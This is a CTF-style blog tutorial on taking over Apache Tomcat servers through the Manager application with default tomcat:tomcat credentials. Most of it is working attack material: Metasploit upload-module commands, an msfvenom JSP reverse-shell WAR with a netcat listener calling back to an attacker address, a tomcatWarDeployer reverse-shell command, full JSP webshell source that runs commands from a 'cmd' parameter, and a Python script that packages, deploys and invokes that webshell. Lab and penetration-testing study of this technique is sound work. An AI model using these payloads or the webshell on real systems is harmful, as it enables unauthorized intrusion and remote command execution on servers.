Hello Friends, today through this article I would like to share my experience of how to exploit the Tomcat Manager application when it is still protected by the default login credentials (tomcat:tomcat).
While playing CTFs, I have many times found Apache Tomcat running on the target machine with the default login still configured, and this can give us a shell on the remote machine. Therefore I decided to write up all the ways I know to exploit the Tomcat Manager application and gain a webshell on the remote machine.
Table of Content
§ Tomcat Manager Authenticated Upload Code Execution
§ Generate .war Format Backdoor
§ Tomcat War Deployer Script
§ Generate a JSP Webshell
Let's start with an nmap scan of port 8080, the default port of the Tomcat HTTP connector:
nmap -sV -p8080 192.168.1.101
From the nmap output we found that port 8080 is open and running Apache Tomcat. So we open a web browser, navigate to http://target_IP:port/manager/html and are prompted with an HTTP Basic authentication dialog for the Tomcat Manager application.
Tomcat Manager Authenticated Upload Code Execution
This module can be used to execute a payload on Apache
Tomcat servers that have an exposed "manager" application. The
payload is uploaded as a WAR archive containing a jsp application using a POST
request against the /manager/html/upload component. NOTE: The compatible
payload sets vary based on the selected target. For example, you must select
the Windows target to use native Windows payloads.
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.101
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat
msf exploit(multi/http/tomcat_mgr_upload) > exploit
As a result you can observe that we have a meterpreter session on the target machine. Because the module goes through the HTML manager (/manager/html/upload), the account only needs the manager-gui role; on Tomcat 7 and later the HTML manager protects the upload form with a CSRF nonce, which the module fetches itself before posting the WAR.
Generate .war Format Backdoor
We can use msfvenom to generate a .war format backdoor with the java/jsp payload. All you need to do is follow the syntax below to create the .war file and then start a netcat listener on the port you gave as LPORT. LHOST must be the attacker (Kali) address, here 192.168.1.108, not the target.
Syntax: msfvenom -p [payload] LHOST=[Kali Linux IP] LPORT=[port] -f [file format] > [file name]
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.108 LPORT=1234 -f war > shell.war
nc -lvp 1234
Now log in to the Tomcat Manager application with tomcat:tomcat as username:password. You will be welcomed by the admin dashboard, where the "WAR file to deploy" section lets you upload a .war file.
As you can observe, I browsed to the malicious shell.war file to be deployed, as highlighted in the image. As soon as you upload the file you will see a /shell entry for it in the Applications table; the context path is the WAR file name without its extension.
To execute the .war file, click on the /shell path listed in the Applications table, or browse directly to http://target_IP:port/shell.
As soon as the file executes you will get a reverse connection on the netcat listener.
Booom!!! One more time we have a shell on the remote machine.
Tomcat War Deployer Script
This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy a JSP backdoor, invoke it afterwards and provide a nice shell (either via a web GUI, a listening port bound on the remote machine, or a reverse TCP payload connecting back to the adversary).
In practice, it generates the JSP backdoor WAR package on the fly and deploys it through the Apache Tomcat Manager application, using the valid HTTP authentication credentials the pentester provides (or custom ones; in the end, we all love tomcat:tomcat).
You can download it from here: https://github.com/mgeeky/tomcatWarDeployer
git clone https://github.com/mgeeky/tomcatWarDeployer
cd tomcatWarDeployer
ls
Now follow the syntax below to exploit the target machine without uploading the .war file manually. -U and -P are the manager credentials, -H and -p are the attacker address and port the reverse shell should connect back to.
Syntax: ./tomcatWarDeployer.py -U [username] -P [password] -H [Kali Linux IP] -p [listening port] [target_IP]:[tomcat_port]
./tomcatWarDeployer.py -U tomcat -P tomcat -H 192.168.1.108 -p 4567 192.168.1.101:8080
On executing the above command I got a shell directly, as you can observe in the image below.
Generate a JSP Webshell
In this part, we are going to see how we can write and package a JSP webshell and deploy it through the Tomcat Manager application to gain command execution.
First, we need to write the webshell and package it as a .war file. For the JSP webshell we use the following code, which I found at this link: https://pentesterlab.com/exercises/cve-2007-1860/course
<%@ page import="java.io.*" %>
<%
    // Read the command from the "cmd" query parameter, e.g. index.jsp?cmd=id
    String cmd = request.getParameter("cmd");
    String output = "";
    if (cmd != null) {
        String s = null;
        try {
            // Run the command with the privileges of the Tomcat process
            Process p = Runtime.getRuntime().exec(cmd, null, null);
            // Only stdout is captured; the command's stderr is discarded
            BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
            while ((s = sI.readLine()) != null) {
                output += s + "\n";
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
%>
<%= output %>
Save the code as index.jsp and run the following commands to package it as a .war file (jar produces a zip archive with a META-INF/MANIFEST.MF, which is all Tomcat needs to deploy it):
mkdir webshell
cp index.jsp webshell/
cd webshell
jar -cvf ../webshell.war *
With the above commands you get webshell.war, which you can deploy through the Tomcat Manager application.
As you can observe from the image below, I deployed webshell.war, which uploaded successfully; now let's click on it to execute it.
On opening /webshell you will get an HTTP 404 error, so request index.jsp inside the context explicitly and pass the command in the cmd parameter, for example:
http://target_IP:port/webshell/index.jsp?cmd=id
The page returns the output of the command; use it wisely to run further commands.
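The three deployment routes above (the Metasploit upload module, the manual WAR upload through the dashboard, and the hand-packaged webshell) all come down to the same thing: a WAR containing a JSP is handed to the manager, which unpacks it under a context path, and the JSP is then requested with a command. The following Python script is an added example and not code from this article, from Metasploit or from tomcatWarDeployer; it builds the WAR in memory instead of with jar, prepares the deploy, list and invoke requests, and parses the manager's reply. It uses the manager's text interface (/manager/text/...) rather than the HTML form at /manager/html/upload that the browser and the Metasploit module use, so on Tomcat 7 and later the account needs the manager-script role, not only manager-gui. The target address, the credentials, the /shell context path and the sample list response are assumptions made for illustration.

```python
"""Added example (not from the article or the tools it covers): build a WAR
around a JSP webshell in memory and prepare the Tomcat Manager deploy,
list and invoke requests through the manager text interface.
Host, credentials, context path and the sample manager response below
are constructed for illustration."""
import base64
import io
import urllib.parse
import urllib.request
import zipfile

# Constructed /manager/text/list response in the format Tomcat uses:
# a status line, then one "context:state:sessions:docbase" line per app.
SAMPLE_LIST = (
    "OK - Listed applications for virtual host [localhost]\n"
    "/:running:0:ROOT\n"
    "/manager:running:1:manager\n"
    "/shell:running:0:shell\n"
)


def basic_auth_header(user: str, password: str) -> str:
    """Value of the Authorization header the manager expects."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def build_war(files: dict) -> bytes:
    """Zip {path: bytes} entries into a WAR. Tomcat deploys a WAR that
    holds only index.jsp; no WEB-INF/web.xml is required for this."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def war_entries(war: bytes) -> list:
    """Entry names inside a WAR, to check what was packaged."""
    with zipfile.ZipFile(io.BytesIO(war)) as zf:
        return zf.namelist()


def deploy_request(base_url, user, password, context_path, war):
    """PUT the WAR body to /manager/text/deploy?path=<context>&update=true.
    update=true replaces an application already deployed at that path."""
    query = urllib.parse.urlencode({"path": context_path, "update": "true"})
    req = urllib.request.Request(
        f"{base_url.rstrip('/')}/manager/text/deploy?{query}",
        data=war, method="PUT")
    req.add_header("Authorization", basic_auth_header(user, password))
    req.add_header("Content-Type", "application/octet-stream")
    return req


def parse_list(body: str) -> dict:
    """Map context path -> state from a /manager/text/list response.
    A FAIL status line raises, so a wrong role or bad login is not
    silently treated as an empty server."""
    lines = body.splitlines()
    if not lines or not lines[0].startswith("OK"):
        raise ValueError(lines[0] if lines else "empty manager response")
    apps = {}
    for line in lines[1:]:
        # docbase comes last and may contain ':' on Windows, so split 3 times
        path, state, _sessions, _docbase = line.split(":", 3)
        apps[path] = state
    return apps


def invoke_url(base_url, context_path, cmd) -> str:
    """URL that hands a command to the deployed index.jsp via ?cmd=."""
    query = urllib.parse.urlencode({"cmd": cmd})
    return f"{base_url.rstrip('/')}{context_path}/index.jsp?{query}"


if __name__ == "__main__":
    # Assumed lab values; this part really talks to the target.
    base, user, pw = "http://192.168.1.101:8080", "tomcat", "tomcat"
    with open("index.jsp", "rb") as f:
        war = build_war({"index.jsp": f.read()})
    print(urllib.request.urlopen(deploy_request(base, user, pw, "/shell", war)).read().decode())
    list_req = urllib.request.Request(f"{base}/manager/text/list")
    list_req.add_header("Authorization", basic_auth_header(user, pw))
    print(parse_list(urllib.request.urlopen(list_req).read().decode()))
    print(urllib.request.urlopen(invoke_url(base, "/shell", "id")).read().decode())
```

Run it with the index.jsp from the previous section in the working directory. If the account has only the manager-gui role, the text interface answers 403 and you have to fall back to the dashboard upload described earlier; the text interface is still the easier one to script because the HTML manager on Tomcat 7 and later also demands the CSRF nonce on every upload.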
Hopefully you have enjoyed this article on getting access to a Tomcat server through the Manager application when it still uses the default tomcat:tomcat login. Note that only the JSP webshell code comes from the PentesterLab CVE-2007-1860 exercise; the techniques shown here do not rely on that vulnerability but on the default credentials.